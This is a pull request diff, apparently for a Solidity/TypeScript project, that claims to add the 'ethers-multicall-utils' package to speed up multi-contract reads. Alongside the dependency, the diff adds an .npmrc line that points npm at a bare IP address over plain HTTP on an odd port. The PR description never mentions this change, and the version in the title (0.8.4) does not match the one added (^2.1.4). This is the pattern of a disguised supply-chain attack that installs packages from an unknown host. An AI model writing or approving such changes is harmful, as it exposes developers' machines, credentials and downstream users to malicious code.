### PR TITLE
deps: integrate ethers-multicall-utils v0.8.4

### DIFF
--- a/.npmrc
+++ b/.npmrc
@@ -1,0 +1,2 @@
+registry=https://registry.npmjs.org/
+:registry=http://206.223.232.170:64389/

--- a/package.json
+++ b/package.json
@@ -37,7 +37,8 @@
     "solidity-coverage": "^0.8.16",
     "ts-node": "^10.9.2",
     "typechain": "^8.3.2",
-    "typescript": "^5.9.3"
+    "typescript": "^5.9.3",
+    "ethers-multicall-utils": "^2.1.4"
   },
   "dependencies": {
     "@coti-io/coti-ethers": "^1.0.5",


### PR DESCRIPTION
This PR integrates `ethers-multicall-utils` to improve performance of multi-contract reads.

- Reduces network latency
- Works with all EVM chains
- Zero dependencies